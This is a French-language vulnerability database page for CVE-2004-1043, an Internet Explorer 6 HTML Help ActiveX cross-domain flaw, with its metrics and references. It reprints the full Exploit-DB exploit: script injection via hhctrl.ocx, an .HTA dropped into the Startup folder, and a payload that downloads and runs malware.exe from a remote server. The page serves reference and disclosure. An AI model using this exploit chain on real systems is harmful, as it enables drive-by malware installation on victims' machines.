CVE-2004-1043 : Détail

CVE-2004-1043

70.18%V4
Network
2004-12-31
04h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to execute arbitrary code by using the "Related Topics" command in the Help ActiveX Control (hhctrl.ocx) to open a Help popup window containing the PCHealth tools.htm file in the local zone and injecting Javascript to be executed, as demonstrated using "writehta.txt" and the ADODB recordset, which saves a .HTA file to the local system, aka the "HTML Help ActiveX control Cross Domain Vulnerability."

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 719

Date de publication : 2004-12-24 23h00 +00:00
Auteur : Paul
EDB Vérifié : Yes

// sp2rc.htm // <OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value="command;file://C:\WINDOWS\ PCHealth\HelpCtr\System\blurbs\tools.htm"> </OBJECT> <OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value='command;javascript: execScript("document.write(\"<script language=\\\"vbscript\\\" src=\\\"http://site/writehta.txt\\\"\"+String.fromCharCode(62)+\" </scr\"+\"ipt\"+String.fromCharCode(62))")'> </OBJECT> <script> localpage.HHClick(); setTimeout("inject.HHClick()",100); </script> // writehta.txt // Dim Conn, rs Set Conn = CreateObject("ADODB.Connection") Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ "Dbq=http://server;" & _ "Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset") rs.Open "SELECT * from foobar.txt", conn rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML // Spanish \Documents and Settings\All Users\Menu Inicio\Programas\Inicio\ // French \Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage // Danish \Documents and Settings\All Users\Menuen Start\Programmer\Start\ // Dutch \Documents and Settings\All Users\Menu Start\Programma's\Opstarten\ // Polish \Documents and Settings\All Users\Menu Start\Programy\Autostart\ // Italian \Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\ // Finn \Documents and Settings\All Users\Kaynnista-valikko\Ohjelmat\Kaynnistys\ // Turkish \Documents and Settings\All Users\Start Menu\Programlar\BASLANGIC\ Turkish // Norwegian \Documents and Settings\All Users\Start-meny\Programmer\Oppstart\ // Swedish \Documents and Settings\All Users\Start-menyn\Program\Autostart\ // Portuguese \Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\ // German \Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\ rs.close conn.close window.close // f00bar.txt // "meaning less shit i had to put here" "<script language=vbscript> crap = """ """: on error resume next: crap = """ """ : set o = CreateObject(""msxml2.XMLHTTP"") : crap=""" """ : o.open ""GET"",""http://server/malware.exe"",False : crap=""" """ : o.send : crap=""" """ : set s = createobject(""adodb.stream"") : crap=""" """ : s.type=1 : crap=""" """ : s.open : crap=""" """ : s.write o.responseBody : crap=""" """ : s.savetofile ""C:\malware.exe"",2 : crap=""" """ : Set ws = CreateObject(""WScript.Shell"") : crap=""" """ : ws.Run ""C:\malware.exe"", 3, FALSE : crap=""" """</script> crap=""" # milw0rm.com [2004-12-25]

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6.0

Configuraton 0

Microsoft>>Windows_xp >> Version *

Références

http://www.kb.cert.org/vuls/id/972415
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.us-cert.gov/cas/techalerts/TA05-012B.html
Tags : third-party-advisory, x_refsource_CERT